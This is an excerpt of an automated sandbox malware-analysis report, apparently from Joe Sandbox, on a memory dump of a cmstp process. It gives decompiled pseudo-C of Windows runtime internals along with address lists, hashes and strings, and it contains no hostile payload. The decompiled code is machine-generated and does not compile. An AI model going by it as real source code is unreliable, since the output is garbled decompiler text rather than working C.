Opcode ID: 5ef03dc55b2374eba246d69a0e103aa3e4999db11d5fd8683a0dce263bd63e2e
Instruction ID: be12a546387a93909ad9e6bf71e138c8ee61642783cdfd4d1a270a2643cfb4af
Opcode Fuzzy Hash: 5ef03dc55b2374eba246d69a0e103aa3e4999db11d5fd8683a0dce263bd63e2e
Instruction Fuzzy Hash: 4FC1C175E10219EFCB24DF98D885BFEBBB6FF58700F555029E811AB290D7B4A841CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0510FAB0 Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0510FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E050EEEF0(0x51c7b60);
					_t134 =  *0x51c7b84; // 0x77577b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x51c7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x51c7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E050E6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E050E76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E05178938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E050DB150();
													}
													_t116 = E05176D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E050E75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x51c8638; // 0x33b0658
																	_t122 = L050E38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E050E76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E050E76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0510FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L050E70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0510FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0510FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0510FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0510FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0510FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x51c7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x51c7b84 = _t75;
						_t73 = E050EEB70(_t134, 0x51c7b60);
						if( *0x51c7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E050EFF60( *0x51c7b20);
							}
						}
						goto L5;
					}
				}
			}

0x0510fab0
0x0510fab2
0x0510fab3
0x0510fab4
0x0510fabc
0x0510fac0
0x0510fb14
0x0510fb17
0x0510fac2
0x0510fac8
0x0510facd
0x0510fad3
0x0510fad3
0x0510fadd
0x0510fb18
0x0510fb1b
0x0510fb1d
0x0510fb1e
0x0510fb1f
0x0510fb20
0x0510fb21
0x0510fb22
0x0510fb23
0x0510fb24
0x0510fb25
0x0510fb26
0x0510fb27
0x0510fb28
0x0510fb29
0x0510fb2a
0x0510fb2b
0x0510fb2c
0x0510fb2d
0x0510fb2e
0x0510fb2f
0x0510fb3a
0x0510fb3b
0x0510fb3e
0x0510fb41
0x0510fb44
0x0510fb47
0x0510fb4a
0x0510fb4d
0x0510fb53
0x0514bdcb
0x0514bdcb
0x0510fb59
0x0510fb5b
0x0510fb5b
0x0510fb5e
0x0514bdd5
0x0514bdd8
0x00000000
0x0514bdda
0x00000000
0x0514bdda
0x0510fb64
0x0510fb64
0x0510fb64
0x0510fb67
0x0510fb6e
0x0510fb70
0x0510fb72
0x00000000
0x0510fb78
0x0510fb7a
0x0510fb7a
0x0510fb7d
0x0510fb80
0x0514bddf
0x0514bde1
0x00000000
0x0514bde3
0x00000000
0x0514bde3
0x0510fb86
0x0510fb86
0x0510fb86
0x0510fb8b
0x0510fb90
0x0510fb92
0x0510fb94
0x0510fb9a
0x0510fb9b
0x0510fba1
0x0514bde8
0x0514bdeb
0x0514bded
0x0514beb5
0x0514beb5
0x0514bebb
0x0514bebd
0x0514bec3
0x0514bed2
0x0514bedd
0x0514bedd
0x0514beed
0x00000000
0x0514bdf3
0x0514bdfe
0x0514be06
0x0514be0b
0x0514be0d
0x0514be0f
0x0514be14
0x0514be19
0x0514be20
0x0514be25
0x0514be27
0x0514be35
0x0514be39
0x0514be46
0x0514be4f
0x0514be54
0x0514be56
0x0514bef8
0x0514bef8
0x00000000
0x0514be5c
0x0514be5c
0x0514be60
0x00000000
0x0514be66
0x0514be66
0x0514be7f
0x0514be84
0x0514be87
0x0514be89
0x0514be8b
0x0514be99
0x0514be9d
0x0514bea0
0x0514beac
0x0514beaf
0x0514beb1
0x0514beb3
0x0514beb3
0x00000000
0x0514bea2
0x0514bea2
0x00000000
0x0514bea2
0x0514be8d
0x0514be8d
0x0514be92
0x00000000
0x0514be92
0x0514be8b
0x0514be60
0x0514be3b
0x0514be3b
0x0514be3e
0x00000000
0x0514be40
0x0514be40
0x0514be44
0x00000000
0x00000000
0x00000000
0x00000000
0x0514be44
0x0514be3e
0x0514be29
0x0514be29
0x00000000
0x0514be29
0x0514be27
0x00000000
0x0510fba7
0x0510fba7
0x0510fbab
0x0514bf02
0x0510fbb1
0x0510fbb1
0x0510fbb8
0x0510fbbd
0x0510fbbd
0x0510fbbf
0x0510fbbf
0x0510fbc5
0x0510fbcb
0x0510fbf8
0x0510fbf8
0x0510fbfa
0x00000000
0x0510fc00
0x0510fc00
0x0510fc03
0x00000000
0x0510fc09
0x0510fc09
0x0510fc0f
0x0510fc15
0x0510fc23
0x0510fc23
0x0510fc25
0x0510fc27
0x0510fc75
0x0510fc7c
0x0510fc84
0x00000000
0x0510fc29
0x0510fc29
0x0510fc2d
0x0510fc30
0x0514bf0f
0x00000000
0x0510fc36
0x0510fc38
0x0510fc3b
0x0510fc41
0x0514bf17
0x0514bf19
0x0514bf48
0x0514bf4b
0x00000000
0x0514bf1b
0x0514bf22
0x0514bf24
0x0514bf26
0x00000000
0x0514bf2c
0x0514bf37
0x0514bf39
0x0514bf3b
0x00000000
0x0514bf41
0x0514bf41
0x0514bf41
0x0514bf41
0x0514bf45
0x00000000
0x0514bf45
0x0514bf3b
0x0514bf26
0x00000000
0x0510fc47
0x0510fc47
0x0510fc49
0x0510fcb2
0x0510fcb4
0x0510fcb6
0x0510fcdc
0x0510fcdc
0x00000000
0x0510fcb8
0x0510fcc3
0x0510fcc5
0x0510fcc7
0x00000000
0x0510fcc9
0x0510fcc9
0x0510fccd
0x00000000
0x0510fccd
0x0510fcc7
0x00000000
0x0510fc4b
0x0510fc4b
0x0510fc4e
0x0510fc4e
0x0510fc51
0x0510fc51
0x0510fc54
0x0510fc5a
0x0510fc5c
0x0510fc5f
0x0510fc61
0x0510fc63
0x0510fc65
0x0510fc67
0x0510fc6e
0x0510fc72
0x0510fc72
0x0510fc72
0x0510fc72
0x0510fc67
0x0510fc61
0x00000000
0x0510fc5a
0x0510fc49
0x0510fc41
0x0510fc30
0x0510fc27
0x0510fc03
0x0510fbcd
0x0510fbd3
0x0510fbd9
0x0510fbdc
0x0510fbde
0x0510fc99
0x0510fc9b
0x0510fc9d
0x0510fcd5
0x0510fcd5
0x0510fc89
0x0510fc89
0x00000000
0x0510fc9f
0x0510fc9f
0x0510fca3
0x00000000
0x0510fca3
0x00000000
0x0510fbe4
0x0510fbe4
0x0510fbe4
0x0510fbe4
0x0510fbe9
0x0510fbf2
0x00000000
0x0510fbf2
0x0510fbde
0x0510fbcb
0x0510fbab
0x0510fc8b
0x0510fc8b
0x0510fc8c
0x0510fb80
0x0510fb72
0x0510fb5e
0x0510fc8d
0x0510fc91
0x0510fadf
0x0510fadf
0x0510fae1
0x0510fae4
0x0510fae7
0x0510faec
0x0510faf8
0x0510fb00
0x0510fb07
0x0510fb0f
0x0510fb0f
0x0510fb07
0x00000000
0x0510faf8
0x0510fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0514BE0F

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 0a7204d48e79e04779746f3098f28f5ca93eb16cb74682b4c8638f3cdae160f0
Instruction ID: 033576022fda1294ce67b84078996859b113b3d59c23891eff38de38297af291
Opcode Fuzzy Hash: 0a7204d48e79e04779746f3098f28f5ca93eb16cb74682b4c8638f3cdae160f0
Instruction Fuzzy Hash: 99A11431B146068FDB35DB64C496BBAB7A6BF44720F04596DE806DB6C0DBB4D842CF90

Uniqueness

Uniqueness Score: -1.00%

Function 050D2D8A Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E050D2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x51c5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x51c7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E051197C0();
				}
				if( *0x51c79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x51c79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E05101624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E050F7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0516FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E05119520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0510E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0512DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x51c6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x51c6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E05119980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E051195D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E050F7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E050F7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E05157016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0516FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x51c5350;
							if(_t109 != 0x51c5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0516FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E05165720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x050d2d8a
0x050d2d8a
0x050d2d92
0x050d2d96
0x050d2d9e
0x050d2da0
0x050d2da3
0x050d2da5
0x050d2da8
0x050d2dab
0x050d2db2
0x0512f9aa
0x0512f9ab
0x0512f9ae
0x0512f9ae
0x050d2db8
0x050d2dc2
0x0512f9b9
0x0512f9be
0x0512f9bf
0x0512f9bf
0x050d2dcf
0x0512f9c9
0x050d2dd5
0x050d2dd5
0x050d2dd5
0x050d2dde
0x050d2de1
0x050d2e70
0x050d2e72
0x050d2e72
0x050d2de7
0x050d2deb
0x050d2e7c
0x050d2e83
0x050d2e85
0x050d2e8b
0x050d2e8d
0x050d2e92
0x050d2e92
0x050d2e85
0x050d2df1
0x050d2df7
0x050d2df9
0x050d2df9
0x050d2dfc
0x050d2dff
0x050d2e02
0x00000000
0x050d2e05
0x050d2e0c
0x0512f9d9
0x050d2e12
0x050d2e12
0x050d2e12
0x050d2e1a
0x0512f9e3
0x0512f9e9
0x0512f9f0
0x0512f9f6
0x0512f9f8
0x0512f9f8
0x0512f9f0
0x050d2e23
0x0512fa02
0x0512fa03
0x0512fa05
0x0512fa06
0x00000000
0x050d2e29
0x050d2e29
0x050d2e2e
0x050d2e34
0x050d2e3e
0x00000000
0x00000000
0x050d2e44
0x050d2e47
0x050d2e4d
0x00000000
0x00000000
0x050d2e4f
0x050d2e54
0x00000000
0x00000000
0x050d2e5a
0x050d2e5f
0x050d2e9a
0x050d2ea4
0x050d2ea5
0x050d2ea8
0x050d2eaf
0x050d2eb2
0x050d2eb5
0x0512fae9
0x0512faeb
0x0512faed
0x0512faef
0x0512faf7
0x0512faf8
0x0512fafd
0x0512faff
0x0512fb04
0x0512fb04
0x0512faff
0x050d2ec0
0x050d2ec4
0x050d2ec6
0x050d2ec8
0x0512fb14
0x0512fb18
0x0512fb1e
0x0512fb21
0x0512fb21
0x050d2ece
0x050d2ece
0x050d2ece
0x050d2ed7
0x050d2e61
0x050d2e63
0x0512fa6b
0x0512fa71
0x0512fa76
0x0512fa78
0x0512fa8a
0x0512fa7a
0x0512fa83
0x0512fa83
0x0512fa8f
0x0512fa91
0x0512fa97
0x0512fa9d
0x0512faa4
0x0512faaa
0x0512faaf
0x0512fab1
0x0512fac3
0x0512fab3
0x0512fabc
0x0512fabc
0x0512fac8
0x0512facb
0x0512fadf
0x0512fadf
0x0512facb
0x0512faa4
0x0512fa91
0x050d2e6f
0x050d2e6f
0x050d2e5f
0x0512fa13
0x0512fa15
0x0512fa17
0x0512fa1f
0x0512fa21
0x0512fa22
0x0512fa25
0x0512fa28
0x0512fa2f
0x0512fa2f
0x0512fa2a
0x0512fa2a
0x0512fa2a
0x0512fa31
0x0512fa34
0x0512fa36
0x0512fa3c
0x0512fa3e
0x0512fa41
0x0512fa43
0x0512fa45
0x0512fa45
0x0512fa41
0x0512fa3c
0x0512fa4a
0x0512fa4f
0x0512fa51
0x0512fa53
0x0512fa56
0x0512fa5b
0x0512fa5e
0x00000000
0x0512fa5e
0x050d2e23

Strings

RTL: Re-Waiting, xrefs: 0512FA4A

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 3b694623598e1f8de750a5a38851e4e78ff54234196525144356e3ddabbb57ce
Instruction ID: be8219ba1be8e6ab4363ec7741d6c17a004a7066a377022ebc510da5f4896322
Opcode Fuzzy Hash: 3b694623598e1f8de750a5a38851e4e78ff54234196525144356e3ddabbb57ce
Instruction Fuzzy Hash: B5614430B047559FDB31DF68E885B7EBBF6FB44710F1406A9E812A72C1C774994287A1

Uniqueness

Uniqueness Score: -1.00%

Function 051A0EA5 Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E051A0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0519FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E051A1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E05119730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0519A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0519A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x51c8b04 >> 0x14) + (_v44 -  *0x51c8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E050F7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0519138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E050F7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0518FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x51c8724 & 0x00000008) != 0) {
						E051952F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E051A15B5(0x51c8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x051a0eb7
0x051a0eb9
0x051a0ec0
0x051a0ec2
0x051a0ecd
0x051a105b
0x051a105b
0x051a1061
0x051a1066
0x051a1066
0x051a106b
0x051a1073
0x051a1073
0x051a0ed3
0x051a0ed6
0x051a0edc
0x051a0ee0
0x051a0ee7
0x051a0ef0
0x051a0ef5
0x051a0efa
0x051a0efc
0x051a0efd
0x051a0f03
0x051a0f04
0x051a0f06
0x051a0f07
0x051a0f09
0x051a0f0e
0x051a0f14
0x051a0f23
0x051a0f2d
0x051a0f34
0x051a0f34
0x051a0f14
0x051a0f52
0x00000000
0x00000000
0x051a0f58
0x051a0f73
0x051a0f74
0x051a0f79
0x051a0f7d
0x051a0f80
0x051a0f86
0x051a0fab
0x051a0fb5
0x051a0fc6
